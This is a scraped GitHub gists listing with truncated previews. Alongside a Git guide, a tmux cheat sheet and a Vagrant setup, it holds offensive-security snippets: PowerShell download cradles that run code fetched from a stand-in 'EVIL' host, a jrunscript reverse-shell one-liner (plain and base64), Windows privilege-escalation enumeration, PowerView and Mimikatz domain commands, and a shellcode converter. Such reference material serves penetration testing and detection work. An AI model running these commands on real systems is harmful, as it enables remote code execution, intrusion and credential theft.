S sunnyneo

## export-process.rst

      
              1 file
            
          
              2 forks
            
          
              3 comments
            
          
              5 stars
            
          
                tmacam
                / export-process.rst
            
            
              Created
              June 12, 2011 19:13
            
              
                Short guide on how to export code to Git and tidy up its history
              
          
    Exporting code to Git and tiding up its history


Author:
Tiago Alves Macambira [tmacam burocarata org]
Licence: Creative Commons By-SA


## tmux.md

      
              1 file
            
          
              759 forks
            
          
              43 comments
            
          
              3542 stars
            
          
                andreyvit
                / tmux.md
            
            
              Created
              June 13, 2012 03:41
            
              
                tmux cheatsheet
              
          
    tmux cheat sheet

(C-x means ctrl+x, M-x means alt+x)
Prefix key

The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:
remap prefix to Control + a


## windows_privesc
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions

Log Source Type:
  MS Event Log for Win7/Win8/2008/2012 - PowerShell

Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
	$LogCommandHealthEvent = $true
	$LogCommandLifeCycleEvent = $true

## PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server

## JVM_POST_EXPLOIT.md

      
              1 file
            
          
              23 forks
            
          
              2 comments
            
          
              50 stars
            
          
                frohoff
                / JVM_POST_EXPLOIT.md
            
            
              Last active
              December 13, 2023 15:02
            
              
                JVM Post-Exploitation One-Liners
              
          
    Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

  
## _readme.md

      
              1 file
            
          
              23 forks
            
          
              4 comments
            
          
              43 stars
            
          
                maxivak
                / _readme.md
            
            
              Last active
              June 8, 2022 06:19
            
              
                Vagrant with Ubuntu 16.04 in VirtualBox
              
          
    Setup Ubuntu 16.04 to be used with Vagrant and Virtualbox

Prepare Vagrant box with Ubuntu 16.04

We will use official box  "ubuntu/xenial64" and modify it to work with Vagrant.

Vagrantfile


## 44con_demo.ps1
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1

# map all reachable domain trusts
Invoke-MapDomainTrust

# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName

## ConvertShellcode.py
import binascii
import sys

file_name = sys.argv[1]
with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
		shellcode += "0x{},".format(i)
Author:	Tiago Alves Macambira [tmacam burocarata org]
Licence:	Creative Commons By-SA
	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	# PowerShell Audit Logging for LogRhythm SIEM - 2015
	# For detecting dangerous PowerShell Commands/Functions

	Log Source Type:
	MS Event Log for Win7/Win8/2008/2012 - PowerShell

	Add this file to your PowerShell directory to enable verbose command line audit logging
	profile.ps1
	$LogCommandHealthEvent = $true
	$LogCommandLifeCycleEvent = $true
	# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
	# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	# import PowerView and Invoke-Mimikatz
	Import-Module .\powerview.ps1
	Import-Module .\mimikatz.ps1

	# map all reachable domain trusts
	Invoke-MapDomainTrust

	# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
	Find-ForeignGroup -Domain external.local
	Find-ForeignGroup -Domain external.local \| Select-Object -ExpandProperty UserName \| Convert-SidToName
	import binascii
	import sys

	file_name = sys.argv[1]
	with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
	shellcode += "0x{},".format(i)